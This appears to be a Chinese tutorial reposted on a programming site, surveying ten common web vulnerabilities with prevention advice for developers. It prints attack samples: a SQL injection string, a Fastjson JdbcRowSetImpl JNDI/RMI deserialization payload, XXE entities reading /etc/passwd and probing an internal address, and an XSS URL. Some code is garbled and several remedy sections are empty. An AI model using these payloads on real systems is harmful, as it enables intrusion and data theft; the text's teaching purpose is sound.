文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

程序员必备基础:10种常见安全漏洞浅析

2024-12-03 05:08

关注

1. SQL 注入

1.1 什么是SQL注入?

SQL注入是一种代码注入技术,一般被应用于攻击web应用程序。它通过在web应用接口传入一些特殊参数字符,来欺骗应用服务器,执行恶意的SQL命令,以达到非法获取系统信息的目的。它目前是黑客对数据库进行攻击的最常用手段之一。

1.2 SQL注入是如何攻击的?

举个常见的业务场景:在web表单搜索框输入员工名字,然后后台查询出对应名字的员工。

这种场景下,一般都是前端页面把一个名字参数name传到后台,然后后台通过SQL把结果查询出来

  1. name = "田螺"; //前端传过来的 
  2.  
  3. SQL= "select * from staff where name=" + name;  //根据前端传过来的name参数,查询数据库员工表staff 

因为SQL是直接拼接的,如果我们完全信任前端传的参数的话。假如前端传这么一个参数时'' or '1'='1',SQL就变成酱紫的啦。

  1. select * from staff where name='' or '1'='1'

这个SQL会把所有的员工信息全都查出来了,酱紫请求用户已经越权啦。请求者可以获取所有员工的信息,其他用户信息已经暴露了啦。

1.3 如何预防SQL注入问题

1.3.1 使用#{}而不是${}

在MyBatis中,使用#{}而不是${},可以很大程度防止sql注入。

1.3.2 不要暴露一些不必要的日志或者安全信息,比如避免直接响应一些sql异常信息。

如果SQL发生异常了,不要把这些信息暴露响应给用户,可以自定义异常进行响应

1.3.3 不相信任何外部输入参数,过滤参数中含有的一些数据库关键词关键词

可以加个参数校验过滤的方法,过滤union,or等数据库关键词

1.3.4 适当的权限控制

在你查询信息时,先校验下当前用户是否有这个权限。比如说,实现代码的时候,可以让用户多传一个企业Id什么的,或者获取当前用户的session信息等,在查询前,先校验一下当前用户是否是这个企业下的等等,是的话才有这个查询员工的权限。

2. JSON反序列化漏洞——如Fastjson安全漏洞

2.1 什么是JSON序列化,JSON发序列化

Json序列化就是将对象转换成Json格式的字符串,JSON反序列化就是Json串转换成对象

2.2 JSON 反序列化漏洞是如何被攻击?

不安全的反序列化可以导致远程代码执行、重放攻击、注入攻击或特权升级攻击。之前Fastjson频繁爆出安全漏洞,我们现在分析fastjson 1.2.24版本的一个反序列化漏洞吧,这个漏洞比较常见的利用手法就是通过jndi注入的方式实现RCE。

我们先来看fastjson一个反序列化的简单例子:

  1. public class User { 
  2.     private String name
  3.  
  4.     private int age; 
  5.  
  6.     public String getName() { 
  7.         return name
  8.     } 
  9.  
  10.     public void setName(String name) { 
  11.         System.out.println("调用了name方法"); 
  12.         this.name = name
  13.     } 
  14.  
  15.     public int getAge() { 
  16.         return age; 
  17.     } 
  18.  
  19.     public void setAge(int age) { 
  20.         System.out.println("调用了age方法"); 
  21.         this.age = age; 
  22.     } 
  23.  
  24.     public static void main(String[] args) { 
  25.         String str = "{\"@type\":\"cn.eovie.bean.User\",\"age\":26,\"name\":\"捡田螺的小男孩\"}"
  26.         User user = JSON.parseObject(str,User.class); 
  27.     } 

运行结果:

  1. 调用了age方法 
  2. 调用了name方法 

加了@type属性就能调用对应对象的setXXX方法,而@type表示指定反序列化成某个类。如果我们能够找到一个类,而这个类的某个setXXX方法中通过我们的精心构造能够完成命令执行,即可达到攻击的目的啦。

com.sun.rowset.JdbcRowSetImpl 就是类似这么一个类,它有两个set方法,分别是setAutoCommit和setDataSourceName”

有兴趣的小伙伴,可以看下它的源代码

  1. public void setDataSourceName(String var1) throws SQLException { 
  2.       if (this.getDataSourceName() != null) { 
  3.           if (!this.getDataSourceName().equals(var1)) { 
  4.               super.setDataSourceName(var1); 
  5.               this.conn = null
  6.               this.ps = null
  7.               this.rs = null
  8.           } 
  9.       } else { 
  10.           super.setDataSourceName(var1); 
  11.       } 
  12.  
  13.   } 
  14.    
  15.     public void setAutoCommit(boolean var1) throws SQLException { 
  16.       if (this.conn != null) { 
  17.           this.conn.setAutoCommit(var1); 
  18.       } else { 
  19.           this.conn = this.connect(); 
  20.           this.conn.setAutoCommit(var1); 
  21.       } 
  22.  
  23.   } 
  24.    
  25.   private Connection connect() throws SQLException { 
  26.       if (this.conn != null) { 
  27.           return this.conn; 
  28.       } else if (this.getDataSourceName() != null) { 
  29.           try { 
  30.               InitialContext var1 = new InitialContext(); 
  31.               DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName()); 
  32.               return this.getUsername() != null && !this.getUsername().equals("") ? var2.getConnection(this.getUsername(), this.getPassword()) : var2.getConnection(); 
  33.           } catch (NamingException var3) { 
  34.               throw new SQLException(this.resBundle.handleGetObject("jdbcrowsetimpl.connect").toString()); 
  35.           } 
  36.       } else { 
  37.           return this.getUrl() != null ? DriverManager.getConnection(this.getUrl(), this.getUsername(), this.getPassword()) : null
  38.       } 
  39.   } 

setDataSourceName 简单设置了设置了dataSourceName的值,setAutoCommit中有connect操作,connect方法中有典型的jndi的lookup方法调用,参数刚好就是在setDataSourceName中设置的dataSourceName。

因此,有漏洞的反序列代码实现如下即可:

  1. public class FastjsonTest { 
  2.  
  3.     public static void main(String[] argv){ 
  4.         testJdbcRowSetImpl(); 
  5.     } 
  6.  
  7.     public static void testJdbcRowSetImpl(){ 
  8.         //JDK 8u121以后版本需要设置改系统变量 
  9.         System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase""true"); 
  10.         //RMI 
  11.         String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 
  12.                 " \"autoCommit\":true}"
  13.         JSONObject.parseObject(payload2); 
  14.     } 

漏洞复现的流程如下哈:

参考的代码来源这里哈,fastjson漏洞代码测试(https://github.com/earayu/fastjson_jndi_poc)

如何解决json反序列化漏洞问题

可以升级版本,比如fastjson后面版本,增强AutoType打开时的安全性 fastjson,增加了AutoType黑名单等等,都是为了应对这些安全漏洞。

反序列化有fastjson、gson、jackson等等类型,可以替换其他类型。

升级+打开safemode

3. XSS 攻击

3.1 什么是XSS?

XSS 攻击全称跨站脚本攻击(Cross-Site Scripting),这会与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,因此有人将跨站脚本攻击缩写为XSS。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。XSS攻击一般分三种类型:存储型 、反射型 、DOM型XSS”

3.2 XSS是如何攻击的?

拿反射型举个例子吧,流程图如下:

我们搞点简单代码样例吧,首先正常html页面如下:

  1. "text" name="name" /> 
  2. "submit" value="搜索" onclick="http://127.0.0.1/search?name="
  3.  

用户输入搜索信息,点击搜索按钮,就是到达正常服务器的。如果黑客在url后面的参数中加入如下的恶意攻击代码。

  1. http://127.0.0.1/search?keyword="http://www.baidu.com"> 

当用户打开带有恶意代码的URL的时候,正常服务器会解析出请求参数 name,得到"",拼接到 HTML 中返回给浏览器。形成了如下的 HTML:

用户浏览器接收到响应后执行解析,其中的恶意代码也会被执行到。

这里的链接我写的是百度搜索页,实际上黑客攻击的时候,是引诱用户输入某些重要信息,然后跳到他们自己的服务器,以窃取用户提交的内容信息。

3.3 如何解决XSS攻击问题

4. CSRF 攻击

4.1 什么是CSRF 攻击?

CSRF,跨站请求伪造(英语:Cross-site request forgery),简单点说就是,攻击者盗用了你的身份,以你的名义发送恶意请求。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。

4.2 CSRF是如何攻击的呢?

我们来看下这个例子哈(来自百度百科)

  1. Tom 登陆银行,没有退出,浏览器包含了Tom在银行的身份认证信息。
  2. 黑客Jerry将伪造的转账请求,包含在在帖子
  3. Tom在银行网站保持登陆的情况下,浏览帖子
  4. 将伪造的转账请求连同身份认证信息,发送到银行网站
  5. 银行网站看到身份认证信息,以为就是Tom的合法操作,最后造成Tom资金损失。

4.3 如何解决CSRF攻击

检查Referer字段。HTTP头中有一个Referer字段,这个字段用以标明请求来源于哪个地址。

添加校验token。

5. 文件上传下载漏洞

5.1 文件上传漏洞

文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。”

解决办法一般就是:

5.2 文件下载漏洞

文件下载漏洞,举个例子,使用 .. 等字符,使应用读取到指定目录之外的其他目录中的文件内容,从而可能读取到服务器的其他相关重要信息。

6. 敏感数据泄露

这个相对比较好理解,一般敏感信息包括密码、用户手机身份证信息、财务数据等等,由于web应用或者API未加密或者疏忽保护,导致这些数据极易被黑客利用。所以我们需要保护好用户的隐私数据,比如用户密码加密保存,请求采用https加密,重要第三方接口采用加签验签,服务端日志不打印敏感数据等等。

7. XXE 漏洞

7.1 什么是XXE

XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。”

7.2 XXE三种攻击场景

场景1. 攻击者尝试从服务端提取数据

  1. "1.0"?> 
  2. ANY)> 
  3. "file:///etc/passwd">]> 
  4. ]> 
  5. &xxe; 

场景2. 攻击者通过将上面的实体行更改为一下内容来探测服务器的专用网络

  1. "https://192.168.1.1/private">]> 

场景3. 攻击者通过恶意文件执行拒绝服务攻击

  1. "file:///dev/random">]> 

7.3 如何防御XXE

8. DDoS 攻击

8.1 什么是DDos攻击

DDoS 攻击,英文全称是 Distributed Denial of Service,谷歌翻译过来就是“分布式拒绝服务”。一般来说是指攻击者对目标网站在较短的时间内发起大量请求,大规模消耗目标网站的主机资源,让它无法正常服务。在线游戏、互联网金融等领域是 DDoS 攻击的高发行业。

为了方便理解,引用一下知乎上一个非常经典的例子

我开了一家有五十个座位的重庆火锅店,由于用料上等,童叟无欺。平时门庭若市,生意特别红火,而对面二狗家的火锅店却无人问津。二狗为了对付我,想了一个办法,叫了五十个人来我的火锅店坐着却不点菜,让别的客人无法吃饭。”

8.2 如何应对 DDoS 攻击?

9. 框架或应用漏洞

10. 弱口令、证书有效性验证、内部接口在公网暴露、未鉴权等权限相关漏洞

10.1 弱口令

10.2 证书有效性验证漏洞

如果不对证书进行有效性验证,那https就如同虚设啦。

10.3 未鉴权等权限相关漏洞

一些比较重要的接口,一般建议鉴权。比如你查询某账号的转账记录,肯定需要先校验该账号是不是操作人旗下的啦。

参考与感谢

本文转载自微信公众号「捡田螺的小男孩」,可以通过以下二维码关注。转载本文请联系捡田螺的小男孩公众号。

 

来源: 捡田螺的小男孩内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯